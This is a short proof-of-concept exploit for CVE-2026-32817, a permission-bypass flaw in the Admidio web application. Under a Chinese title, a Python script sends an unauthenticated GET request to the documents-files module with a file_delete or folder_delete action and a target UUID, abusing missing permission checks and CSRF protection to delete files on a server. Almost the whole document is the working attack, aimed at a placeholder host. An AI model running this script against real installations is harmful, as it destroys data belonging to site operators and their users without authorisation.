CVE-2026-32817 Admidio文件删除权限绕过漏洞

import requests # POC for CVE-2026-32817 # Description: Delete a file/folder via plain HTTP GET request due to missing permission checks and CSRF protection. def exploit(target_url, target_uuid): # The endpoint is modules/documents-files.php # Vulnerable parameters are derived from the description (folder_delete/file_delete actions) # This example demonstrates the file_delete action full_url = f"{target_url}/modules/documents-files.php" # Parameters based on the vulnerability description params = { 'mode': 'file_delete', # or 'folder_delete' 'uuid': target_uuid # The UUID of the target file/folder } try: response = requests.get(full_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {full_url}") print(f"[+] Status Code: {response.status_code}") print("[+] Check if the file/folder has been deleted.") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and a valid UUID obtained via reconnaissance target = "http://example.com/admidio" uuid = "VALID_UUID_HERE" exploit(target, uuid)